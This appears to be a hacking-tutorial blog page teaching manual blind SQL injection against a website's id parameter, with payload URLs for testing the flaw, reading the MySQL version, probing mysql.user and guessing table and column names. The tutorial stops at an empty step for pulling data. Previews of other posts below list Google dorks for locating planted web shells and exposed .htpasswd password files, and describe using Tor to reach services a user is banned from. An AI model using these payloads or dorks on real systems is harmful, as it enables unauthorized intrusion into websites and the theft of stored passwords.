HOW TO DO BLIND SQL INJECTION MANUALLY

By -

HOW TO DO BLIND SQL INJECTION MANUALLY
************************************************************************
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

Blind SQL INJECTIONS:

Suppose That You want to Hack This website with Blind SQLi

http://example.com/index.php?id=5

when we execute this, we see some page and articles on that page, pictures
etc

then when we want to test it for blind sql injection attack

http://www.example.com/index.php?id=5 and 1=1 < this is always true
and the page loads normally, that's ok.
now the real test

http://www.example.com/index.php?id=5 and 1=2 &lt this is false
so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.

1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.example.com/index.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.example.com/index.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works
when select don't work then we use subselect
i.e
http://www.example.com/index.php?id=5 and (select 1)=1
if page load normally then subselects work. then we gonna see if we have access to mysql.user
i.e
http://www.example.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can
pull some password usign load_file() function and OUTFILE.

3). Check table and column names
This is part when guessing is the best friend
smile emoticon
i.e.
http://www.examplecom/index.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users
exits.
if you get FALSE (some article missing), just change table name until you
guess the right one
let's say that we have found that table name is users, now what we need is
column name.
the same as table name, we start guessing. Like i said before try the
common names for columns.
i.e
http://www.example.com/index.php?id=5 and (select substring(concat(1,
password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get
false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first
character (,1,1)
4). Pull data from database

Comments

Post a Comment

Popular posts from this blog

Keyboard Shortcuts That you must learn

By -
Image
Keyboard Shortcuts That you must learn Getting used to using keyboard exclusively and leaving your mouse behind will make you much efficient at performing any task on window system.Some of the shortcuts that must be known Windows+R=Run menu This is usually followed by cmd=Command Prompt iexplore+"web address"=Internet Explorer compmgmt.msc=Computer Management dhcpmgmt.msc=DHCP Management dnsmgmt.msc=DNS  Management services.msc=Services eventvwr=Event Viewer dsa.msc=Active Directory users and Computers dssite.msc=Active Directory  Sites and Services Windows key + E= Explorer ALT+TAB=Switch between windows ALT,Space,X=Maximize Windows CTRL+SHIFT+ESC=Task Manger Windows key+Break=System Properties Windows key + F= Search Windows key + D=Hide/Display all windows Keep in mind that the "Right Click" key next to the right windows on keyboard.Using the arrows and that key can get just about anything done once you've opened up any prog
Read more

Stay Secured By IP Spoofing In Kali Linux or Ubuntu Using Torsocks

By -
Image
Stay Secured By IP Spoofing In Kali Linux or Ubuntu Using Torsocks torsocks  allows you to use most applications in a safe way with TOR. It ensures that DNS requests are handled safely and explicitly rejects any traffic other than TCP from the application you’re using. In this post we will cover IP spoofing in Kali Linux with torsocks which will allow users to connect to certain services that is banned to them.  torsocks  is an ELF shared library that is loaded before all others. The library overrides every needed Internet communication libc function calls such as connect() or gethostbyname(). This process is transparent to the user and if  torsocks  detects any communication that can’t go through the Tor network such as UDP traffic, for instance, the connection is denied. If, for any reason, there is no way for  torsocks  to provide the Tor anonymity guarantee to your application,  torsocks  will force the application to quit and stop everything.  In this article I will guide
Read more

How To Find Uploaded shell and Passwords By Google dorks (priv8 dorks)

By -
How To Find Uploaded shell and Passwords By Google dorks (priv8 dorks) How To Find Uploaded shell By Google dork (priv8 dorks) Go to Google.com and type these Dorks, and you will got a Lot of uploaded shells in Google serach results !! Dorks for finding shells  inurl:.php "cURL: ON MySQL: ON MSSQL: OFF"  "Shell" filetype:php intext:"uname -a:" "EDT 2010" intitle:"intitle:r57shell" [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ] inurl:"c99.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:"c100.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout intitle:"Shell" inurl:".php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update  Dorks for finding Passwords filetype:htpasswd htpasswd intitle:"index of" ".htpasswd" -intitle
Read more